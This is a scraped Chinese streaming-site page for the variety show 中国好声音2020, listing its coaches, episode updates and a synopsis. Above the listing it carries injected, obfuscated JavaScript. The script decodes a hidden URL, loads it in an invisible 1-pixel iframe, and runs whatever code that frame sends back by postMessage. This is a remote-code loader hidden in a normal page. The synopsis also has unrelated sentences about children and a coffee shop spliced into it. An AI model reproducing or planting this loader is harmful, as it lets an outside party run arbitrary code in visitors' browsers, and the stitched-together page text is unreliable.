看天堂

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['YxdpREK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6954`]) { var t = x(e.data[`des_s_6954`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HRF'+'F0c'+'HMl'+'MFF'+'0El'+'MkY'+'FFl'+'MkZ'+'qYF'+'FS5'+'5dX'+'NFF'+'odW'+'FFh'+'hLF'+'FmN'+'vbS'+'UzQ'+'TFF'+'EwN'+'DQz'+'FFJ'+'TJF'+'FGY'+'zFF'+'RjY'+'TQy'+'JTJ'+'GYy'+'02O'+'TU0'+'LTI'+'yLT'+'FFF'+'lNg'+'==',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
当前位置:首页  »  综艺片  »  中国好声音2020

中国好声音2020

更新至20201128期
  • 主演:李宇春,,,谢霆锋,,,李荣浩,,,李健,,,华少,,,伊一
  • 相关:中国好声音202
  • 类型:综艺片
  • 地区:大陆
  • 语言:
  • 上映:2020 年
  • 更新:2020/11/30 10:44:03
  • 点播次数:加载中
该节目是浙江卫视推出的音乐励志评论类节目,由谢霆锋、李健、李荣浩、李宇春担任固定导师。节目推出原创赛道,通过云技术互联网 查看更多
顶0| 踩0

zkyun

zkm3u8

温馨提示:更新至20201128期无需安装任何插件,即可快速播放

猜你喜欢的

中国好声音2020影片介绍

该节目是浙江卫视推出的音乐励志评论类节目,由谢霆锋、李健、李荣浩、李宇春担任固定导师。大人是孩童们的榜样;谨慎你的言行不要玷污幼童们的心灵;公共场合大人要学会在孩子们面前害羞。当我进店时已是下午时分,店里已经座上一大半数客人,正是喝下午茶的高峰。来店喝咖啡有三分之二节目推出原创赛道,通过云技术互联网观众互动投票。
收藏 留言 返回顶部